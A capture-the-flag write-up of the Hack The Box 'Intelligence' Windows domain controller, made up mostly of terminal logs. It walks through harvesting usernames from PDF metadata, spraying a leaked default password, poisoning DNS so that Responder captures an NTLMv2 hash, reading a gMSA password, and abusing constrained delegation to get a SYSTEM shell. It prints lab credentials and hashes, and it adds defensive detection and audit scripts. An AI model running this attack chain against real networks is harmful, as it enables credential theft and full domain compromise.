Intelligence

Nmap scan

kali@kali  ~/HTB/intelligence/intelligence2 
▶  nmap -sV -sC -oA intelligence  $IP -Pn        
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-02 06:43 EDT
Nmap scan report for intelligence.htb (10.10.10.248)
Host is up (0.28s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Intelligence
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-02 17:44:11Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2023-10-02T17:45:36+00:00; +7h00m06s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2023-10-02T17:45:35+00:00; +7h00m06s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2023-10-02T17:45:36+00:00; +7h00m06s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-02T17:45:35+00:00; +7h00m06s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-10-02T17:44:55
|_  start_date: N/A
|_clock-skew: mean: 7h00m05s, deviation: 0s, median: 7h00m05s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.66 seconds
 kali@kali  ~/HTB/intelligence/intelligence2 

Check port 80 first as low-hanging fruit: a potential foothold.

Looking around the site, there is a link to download a document: http://10.10.10.248/documents/2020-01-01-upload.pdf

Download the document and check its EXIF metadata:

 kali@kali  ~/HTB/intelligence/intelligence2 
▶  ls
2020-01-01-upload.pdf  intelligence.gnmap  intelligence.nmap  intelligence.xml
 kali@kali  ~/HTB/intelligence/intelligence2 
▶  exiftool 2020-01-01-upload.pdf
ExifTool Version Number         : 12.65
File Name                       : 2020-01-01-upload.pdf
Directory                       : .
File Size                       : 27 kB
File Modification Date/Time     : 2021:04:01 13:00:00-04:00
File Access Date/Time           : 2023:10:02 06:52:39-04:00
File Inode Change Date/Time     : 2023:10:02 06:52:39-04:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : William.Lee
 kali@kali  ~/HTB/intelligence/intelligence2 

We see there is a user called William.Lee.

Changing the date in the URL shows there are other documents, such as http://10.10.10.248/documents/2020-01-02-upload.pdf

We used the following script to download all the files for the year 2020:

#!/bin/bash

base_url="http://10.10.10.248/documents"
year=2020

for month in $(seq -w 1 12); do
    case $month in
        01|03|05|07|08|10|12) days=31;;
        04|06|09|11) days=30;;
        02)
            # For 2020, which is a leap year
            days=29
            ;;
    esac

    for day in $(seq -w 1 $days); do
        url="${base_url}/${year}-${month}-${day}-upload.pdf"
        
        # Check if file exists without downloading it
        if wget --spider -q "$url" 2>/dev/null; then
            wget "$url"  # Only download if the file exists
        fi
    done
done

 kali@kali  ~/HTB/intelligence 

Running the script from a new pdf folder downloads all the files:

 kali@kali  ~/HTB/intelligence 
▶  cd intelligence2/pdf                                    
 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  ls
download_pdfs.sh
 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  ./download_pdfs.sh 

Contents of the pdf folder:

▶  ls
2020-01-01-upload.pdf  2020-05-20-upload.pdf  2020-09-04-upload.pdf
2020-01-02-upload.pdf  2020-05-21-upload.pdf  2020-09-05-upload.pdf
2020-01-04-upload.pdf  2020-05-24-upload.pdf  2020-09-06-upload.pdf
2020-01-10-upload.pdf  2020-05-29-upload.pdf  2020-09-11-upload.pdf
2020-01-20-upload.pdf  2020-06-02-upload.pdf  2020-09-13-upload.pdf
2020-01-22-upload.pdf  2020-06-03-upload.pdf  2020-09-16-upload.pdf
2020-01-23-upload.pdf  2020-06-04-upload.pdf  2020-09-22-upload.pdf
2020-01-25-upload.pdf  2020-06-07-upload.pdf  2020-09-27-upload.pdf
2020-01-30-upload.pdf  2020-06-08-upload.pdf  2020-09-29-upload.pdf

Script to extract the "Creator" field from every PDF and append the values to users.txt:

▶  cat exif.sh         
#!/bin/bash

# Directory containing the PDF files
dir="."

# Iterate over all PDF files in the directory
for pdf in "$dir"/*.pdf; do
    # Extract the 'Creator' field using exiftool
    creator=$(exiftool -Creator "$pdf" | awk -F': ' '{print $2}')
    if [ ! -z "$creator" ]; then  # Check if the 'Creator' field is not empty
        echo "$creator" >> users.txt
    fi
done

▶  ./exif.sh         
 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  less users.txt 
 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  more users.txt   
William.Lee
Scott.Scott
Jason.Wright
Veronica.Patel
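The exif.sh script above shows how much a publishing team gives away in PDF metadata. As an added example (not from the original writeup), here is the same audit done in Python without external tools: a minimal parser for the PDF Info dictionary that pulls the Creator and Author fields, handling literal strings with backslash and octal escapes as well as UTF-16 hex strings. It reads uncompressed Info dictionaries only; files that keep the Info object inside a compressed object stream still need exiftool or pypdf. The sample PDFs are constructed inline and are not the box's files.

```python
import re
from typing import Dict, List

# Info-dictionary fields that commonly leak account names. The value is either a
# literal string "(...)" (with backslash escapes) or a hex string "<...>".
_INFO_ENTRY = re.compile(
    rb"/(Creator|Author|Producer|Title|Subject)\s*"
    rb"(\((?:\\.|[^\\)])*\)|<[0-9A-Fa-f\s]*>)"
)
_SIMPLE_ESCAPES = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f",
                   b"(": b"(", b")": b")", b"\\": b"\\"}
_OCTAL = re.compile(rb"[0-7]{1,3}")


def _unescape_literal(body: bytes) -> bytes:
    """Resolve PDF literal-string escapes: \\( \\) \\\\, \\n-style codes and 1-3 digit octal."""
    def repl(m: "re.Match[bytes]") -> bytes:
        esc = m.group(1)
        if _OCTAL.fullmatch(esc):
            return bytes([int(esc, 8) & 0xFF])
        return _SIMPLE_ESCAPES.get(esc, esc)
    return re.sub(rb"\\([0-7]{1,3}|.)", repl, body, flags=re.DOTALL)


def _decode_pdf_string(raw: bytes) -> str:
    """Decode a literal or hex PDF string to text (UTF-16BE when it carries a BOM)."""
    if raw.startswith(b"<"):
        digits = re.sub(rb"\s", b"", raw[1:-1])
        if len(digits) % 2:          # the spec treats a missing final digit as 0
            digits += b"0"
        data = bytes.fromhex(digits.decode("ascii"))
    else:
        data = _unescape_literal(raw[1:-1])
    if data.startswith(b"\xfe\xff"):
        return data[2:].decode("utf-16-be", errors="replace")
    # PDFDocEncoding is close enough to Latin-1 for ASCII account names
    return data.decode("latin-1")


def extract_pdf_metadata(pdf_bytes: bytes) -> Dict[str, str]:
    """Return the first value seen for each Info field present in the file."""
    found: Dict[str, str] = {}
    for m in _INFO_ENTRY.finditer(pdf_bytes):
        key = m.group(1).decode("ascii")
        found.setdefault(key, _decode_pdf_string(m.group(2)))
    return found


def collect_usernames(pdfs: Dict[str, bytes]) -> List[str]:
    """Distinct, non-empty Creator/Author values across a set of PDFs, sorted."""
    names = set()
    for data in pdfs.values():
        meta = extract_pdf_metadata(data)
        for field in ("Creator", "Author"):
            value = meta.get(field, "").strip()
            if value:
                names.add(value)
    return sorted(names)


def _fake_pdf(info_entries: bytes) -> bytes:
    # Constructed stand-in: just enough structure to carry an Info dictionary.
    return (b"%PDF-1.5\n1 0 obj\n<< " + info_entries + b" >>\nendobj\n"
            b"trailer\n<< /Info 1 0 R >>\n%%EOF\n")


# Constructed sample set (not the documents from the box).
SAMPLE_PDFS: Dict[str, bytes] = {
    "a.pdf": _fake_pdf(b"/Creator (William.Lee) /Producer (Microsoft Word)"),
    "b.pdf": _fake_pdf(b"/Creator <"
                       + (b"\xfe\xff" + "Scott.Scott".encode("utf-16-be")).hex().encode()
                       + b">"),
    "c.pdf": _fake_pdf(b"/Author (Veronica\\056Patel) /Creator ()"),  # \056 is an octal '.'
    "d.pdf": _fake_pdf(b"/Producer (LibreOffice)"),  # no account name at all
}

if __name__ == "__main__":
    for name, data in SAMPLE_PDFS.items():
        print(name, extract_pdf_metadata(data))
    print("usernames:", collect_usernames(SAMPLE_PDFS))
```

Run this over a publishing directory before upload and strip or normalise any field that returns a real account name; the writeup shows exactly what happens when that step is skipped.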

We combine all the PDFs into a single text file so we can search for a word like "password", using pdftotext:

 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  for pdf in *.pdf; do
    pdftotext "$pdf" - >> combined.txt
done

 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  

Search for the word "password" in this file and show one line before and after each match:

▶  grep -B 1 -A 1 "password" combined.txt

Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.

 kali@kali  ~/HTB/intelligence/intelligence2/pdf 

We get the default password: NewIntelligenceCorpUser9876

We check the password against all the users with crackmapexec:


 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  crackmapexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876  
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 

The last attempt gives a valid login for Tiffany.Molina:

SMB         10.10.10.248    445    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876
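From the defender's side, the spray above is one source address failing logons for many different accounts within seconds and then succeeding for one of them. As an added example (not part of the original writeup), the following detection runs over a constructed, simplified export of Windows Security events (4625 failed logon, 4624 successful logon) and flags any source IP that fails for at least five distinct accounts inside a five-minute window, listing the accounts that later logged on from that source. The log format, thresholds and addresses are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed, simplified logon-audit export (not real DC logs):
#   <UTC time> <event id> <account> <source ip>
# Event ID 4625 = failed logon, 4624 = successful logon (Windows Security log).
SAMPLE_LOG = r"""
2023-10-02T17:44:01Z 4625 intelligence.htb\William.Lee 10.10.14.21
2023-10-02T17:44:02Z 4625 intelligence.htb\Scott.Scott 10.10.14.21
2023-10-02T17:44:03Z 4625 intelligence.htb\Jason.Wright 10.10.14.21
2023-10-02T17:44:04Z 4625 intelligence.htb\Veronica.Patel 10.10.14.21
2023-10-02T17:44:05Z 4625 intelligence.htb\Richard.Williams 10.10.14.21
2023-10-02T17:44:06Z 4624 intelligence.htb\Tiffany.Molina 10.10.14.21
2023-10-02T17:30:00Z 4625 intelligence.htb\Ted.Graves 10.10.10.50
2023-10-02T17:30:20Z 4625 intelligence.htb\Ted.Graves 10.10.10.50
2023-10-02T17:30:45Z 4624 intelligence.htb\Ted.Graves 10.10.10.50
"""

_LINE = re.compile(r"^(\S+) (\d{4}) (\S+) (\S+)$")

Event = Tuple[datetime, int, str, str]  # (time, event id, account, source ip)


def parse_events(text: str) -> List[Event]:
    """Parse the constructed export into time-sorted events; malformed lines are skipped."""
    events: List[Event] = []
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
        # account names are case-insensitive in AD, so normalise before counting
        events.append((ts, int(m.group(2)), m.group(3).lower(), m.group(4)))
    return sorted(events)


def detect_spray(text: str, window_s: int = 300, min_users: int = 5) -> List[Dict]:
    """Flag source IPs that fail logons for >= min_users distinct accounts inside window_s."""
    by_ip: Dict[str, List[Event]] = defaultdict(list)
    for ev in parse_events(text):
        by_ip[ev[3]].append(ev)

    alerts = []
    for ip, evs in by_ip.items():
        failures = [e for e in evs if e[1] == 4625]
        peak = 0
        start = 0
        for end in range(len(failures)):
            # slide the window start forward until the span fits inside window_s
            while (failures[end][0] - failures[start][0]).total_seconds() > window_s:
                start += 1
            peak = max(peak, len({e[2] for e in failures[start:end + 1]}))
        if peak >= min_users:
            # accounts that did log on from a spraying source are the ones to reset first
            successes = sorted({e[2] for e in evs if e[1] == 4624})
            alerts.append({"source": ip, "distinct_users": peak, "succeeded": successes})
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_LOG):
        print(alert)
```

A single user mistyping a password twice (10.10.10.50 in the sample) never trips the rule because the count is of distinct accounts, not attempts. The root cause the rule cannot fix is the one the writeup exposes: a shared default password printed in a public document and never rotated.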

We check with crackmapexec whether the account can log in over WinRM (which would give us a shell), but no luck:

▶  crackmapexec winrm 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876
SMB         10.10.10.248    5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:intelligence.htb)
HTTP        10.10.10.248    5985   DC               [*] http://10.10.10.248:5985/wsman
WINRM       10.10.10.248    5985   DC               [-] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

We list the shares:

SMB         10.10.10.248    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.248    445    DC               C$                              Default share
SMB         10.10.10.248    445    DC               IPC$            READ            Remote IPC
SMB         10.10.10.248    445    DC               IT              READ            
SMB         10.10.10.248    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.10.248    445    DC               SYSVOL          READ            Logon server share 
SMB         10.10.10.248    445    DC               Users           READ   

We have read access to the Users share.

Connecting to the Users share:

▶  smbclient \\\\10.10.10.248\\users -U tiffany.molina%NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Apr 18 21:20:26 2021
  ..                                 DR        0  Sun Apr 18 21:20:26 2021
  Administrator                       D        0  Sun Apr 18 20:18:39 2021
  All Users                       DHSrn        0  Sat Sep 15 03:21:46 2018
  Default                           DHR        0  Sun Apr 18 22:17:40 2021
  Default User                    DHSrn        0  Sat Sep 15 03:21:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:11:27 2018
  Public                             DR        0  Sun Apr 18 20:18:39 2021
  Ted.Graves                          D        0  Sun Apr 18 21:20:26 2021
  Tiffany.Molina                      D        0  Sun Apr 18 20:51:46 2021

		3770367 blocks of size 4096. 1463758 blocks available
smb: \> 

We are able to get the user flag:

smb: \> cd Tiffany.Mplina
cd \Tiffany.Mplina\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd Tiffany.Molina
smb: \Tiffany.Molina\> ls

smb: \Tiffany.Molina\> cd Desktop
smb: \Tiffany.Molina\Desktop\> ls
  .                                  DR        0  Sun Apr 18 20:51:46 2021
  ..                                 DR        0  Sun Apr 18 20:51:46 2021
  user.txt                           AR       34  Mon Oct  2 13:42:29 2023
		3770367 blocks of size 4096. 1463758 blocks available
smb: \Tiffany.Molina\Desktop\> type user.txt
type: command not found
smb: \Tiffany.Molina\Desktop\> cat user.txt
cat: command not found
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Tiffany.Molina\Desktop\> 

▶  cat user.txt  
9e0e4c1cdafbb30517b2ed66346a81cd
 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  

Tiffany also has read access to the IT share; we connect to it and get the .ps1 file in there:

                                  D        0  Sun Apr 18 20:50:55 2021
  downdetector.ps1                    A     1046  Sun Apr 18 20:50:55 2021

		3770367 blocks of size 4096. 1463758 blocks available
smb: \> get downdetector.ps1 
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \> 

The file contents:

Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <[email protected]>' -To 'Ted Graves <[email protected]>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}

After some research, we find that dnstool.py (from krbrelayx) and Responder can be used to capture credentials from this script: it requests every DNS record in the zone whose name starts with "web" using the default credentials of the account running it, so a record added to the zone that points at our host makes that account authenticate to Responder.

We run Responder:

▶  sudo python Responder.py -I tun0 -i 10.10.14.21 -A


and run dnstool to add the DNS record:

▶  python dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r webfakedomain.intelligence.htb --data 10.10.14.21 10.10.10.248

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
 kali@kali  ~/HTB/intelligence/krbrelayx   master 
▶  
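The record above was added with an ordinary user's credentials, which works because AD-integrated DNS zones let Authenticated Users create child objects by default. As an added example (not part of the original writeup), the following audit runs over a constructed snapshot of A records from the DomainDnsZones partition and flags records that point outside the corporate address range or were created by a non-privileged principal, rating a finding high when its name matches the "web" prefix that the downdetector.ps1 script consumes. The record list, the allowed network, the trusted owners and the "owner" field (standing in for the owner of each dnsNode object's security descriptor) are assumptions for the example.

```python
import ipaddress
from typing import Dict, Iterable, List

# Constructed snapshot of A records from the DomainDnsZones partition (not pulled from the box).
# "owner" stands in for the owner of the dnsNode object's security descriptor, i.e. who created it.
SAMPLE_RECORDS: List[Dict[str, str]] = [
    {"name": "dc", "data": "10.10.10.248", "owner": "INTELLIGENCE\\DC$"},
    {"name": "web01", "data": "10.10.10.30", "owner": "INTELLIGENCE\\Domain Admins"},
    {"name": "svc_int", "data": "10.10.10.249", "owner": "INTELLIGENCE\\DC$"},
    {"name": "webfakedomain", "data": "10.10.14.21", "owner": "INTELLIGENCE\\Tiffany.Molina"},
]

# Assumed corporate address space and the principals expected to create records.
ALLOWED_NETWORKS = [ipaddress.ip_network("10.10.10.0/24")]
TRUSTED_OWNERS = {"INTELLIGENCE\\DC$", "INTELLIGENCE\\Domain Admins", "INTELLIGENCE\\DnsAdmins"}


def audit_dns_records(records: Iterable[Dict[str, str]],
                      allowed_networks=ALLOWED_NETWORKS,
                      trusted_owners=TRUSTED_OWNERS,
                      watched_prefix: str = "web") -> List[Dict]:
    """One finding per record that points outside the allowed networks or was created by a
    non-privileged principal. Names matching the prefix a scheduled task resolves with
    default credentials are rated high; everything else medium."""
    findings = []
    for rec in records:
        issues = []
        try:
            addr = ipaddress.ip_address(rec["data"])
        except ValueError:
            addr = None
            issues.append(f"unparseable address {rec['data']!r}")
        if addr is not None and not any(addr in net for net in allowed_networks):
            issues.append(f"{addr} is outside the allowed networks")
        if rec["owner"] not in trusted_owners:
            issues.append(f"created by non-privileged principal {rec['owner']}")
        if issues:
            matches = rec["name"].lower().startswith(watched_prefix.lower())
            findings.append({
                "name": rec["name"],
                "severity": "high" if matches else "medium",
                "issues": issues,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_dns_records(SAMPLE_RECORDS):
        print(finding["severity"].upper(), finding["name"], "-", "; ".join(finding["issues"]))
```

The two fixes the audit points at are removing the default create permission for Authenticated Users on the zone and replacing the script's wildcard lookup with a fixed list of hosts that are allowed to receive the account's credentials.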

Responder captures a hash for Ted.Graves:

Ted.Graves::intelligence:2291e74033392ca... [rest of hash truncated]

We save this to a file called ted. It is a Net-NTLMv2 hash, which hashcat cracks with mode 5600.

Running this through hashcat with the rockyou wordlist:

▶  cd /usr/bin       
 kali@kali  /usr/bin 
▶  sudo ./hashcat -m 5600 /home/kali/HTB/intelligence/ted /usr/share/wordlists/rockyou.txt

We run bloodhound-python with Ted's cracked password to collect the JSON files that we can load into BloodHound:


▶  bloodhound-python -u TED.GRAVES -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb -c all

INFO: Found AD domain: intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 42 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The resolution lifetime expired after 3.202 seconds: Server Do53:10.10.10.248@53 answered The DNS operation timed out.; Server Do53:10.10.10.248@53 answered The DNS operation timed out.

We start neo4j and load the JSON files into BloodHound.

Research: Ted.Graves is in the ITSupport group, which has ReadGMSAPassword on SVC_INT. Even more interestingly, the pre-built query "Shortest Paths from Owned Principals" shows that the svc_int account has AllowedToDelegate on the DC.

There is a tool for reading gMSA passwords at https://github.com/micahvandeusen/gMSADumper:

▶  wget https://raw.githubusercontent.com/micahvandeusen/gMSADumper/main/gMSADumper.py
--2023-10-02 08:36:04--  https://raw.githubusercontent.com/micahvandeusen/gMSADumper/main/gMSADumper.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6287 (6.1K) [text/plain]
Saving to: ‘gMSADumper.py’

gMSADumper.py            100%[===============================>]   6.14K  --.-KB/s    in 0.001s  

2023-10-02 08:36:05 (6.33 MB/s) - ‘gMSADumper.py’ saved [6287/6287]

 kali@kali  ~/HTB/intelligence/intelligence2 
▶  

We run it with Ted's credentials and get the NT hash (plus the AES Kerberos keys) for the svc_int$ account:

▶  python gMSADumper.py -u Ted.Graves -p Mr.Teddy -l intelligence.htb -d intelligence.htb
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::ff3418066942aa8bd228ea17dc71999a
svc_int$:aes256-cts-hmac-sha1-96:30844881b57965c3a115cafa00eb0935928ff0af889f3818e0bc1ccf50c0cbfb
svc_int$:aes128-cts-hmac-sha1-96:327f8f8594183dfe4f430986556147b2
 kali@kali  ~/HTB/intelligence/intelligence2 

We use Impacket's getST.py. Because svc_int has AllowedToDelegate to the DC (constrained delegation), getST.py can obtain a TGT for svc_int with its NT hash and then request a service ticket for www/dc.intelligence.htb on behalf of administrator via S4U2self and S4U2proxy:

 kali@kali  ~/HTB/intelligence/intelligence2 
▶  locate getST.py
/usr/share/doc/python3-impacket/examples/getST.py
 kali@kali  ~/HTB/intelligence/intelligence2 
▶  cd /usr/share/doc/python3-impacket/examples/             
 kali@kali  /usr/share/doc/python3-impacket/examples 
▶  getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :ff3418066942aa8bd228ea17dc71999a -impersonate administrator intelligence.htb/svc_int
zsh: command not found: getST.py
 ✘ kali@kali  /usr/share/doc/python3-impacket/examples 
▶  ./getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :ff3418066942aa8bd228ea17dc71999a -impersonate administrator intelligence.htb/svc_int
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
 kali@kali  /usr/share/doc/python3-impacket/examples 

The DC clock is about seven hours ahead of ours (see the clock-skew in the nmap output), so we sync our time to the DC and retry:

▶  /usr/share/doc/python3-impacket/examples/getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :ff3418066942aa8bd228ea17dc71999a -impersonate administrator intelligence.htb/svc_int
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
 kali@kali  ~/HTB/intelligence/intelligence2 
▶  ls             
2020-01-01-upload.pdf  gMSADumper.py    intelligence.gnmap  intelligence.xml
administrator.ccache   gMSADumper.py.1  intelligence.nmap   pdf
 kali@kali  ~/HTB/intelligence/intelligence2 

We export the ticket into the environment:


 kali@kali  ~/HTB/intelligence/intelligence2 
▶  export KRB5CCNAME=administrator.ccache 

Using psexec.py with the Kerberos ticket:

▶  /usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass [email protected]@dc.intelligence.htb

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file fJuQdKmn.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service pONO on dc.intelligence.htb.....
[*] Starting service pONO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is E3EF-EBBD

 Directory of C:\Users\Administrator\Desktop

04/18/2021  05:51 PM    <DIR>          .
04/18/2021  05:51 PM    <DIR>          ..
10/02/2023  10:42 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   5,988,077,568 bytes free

C:\Users\Administrator\Desktop> type root.txt
47db65fca4342911729f61bf4b7fe6c1

C:\Users\Administrator\Desktop>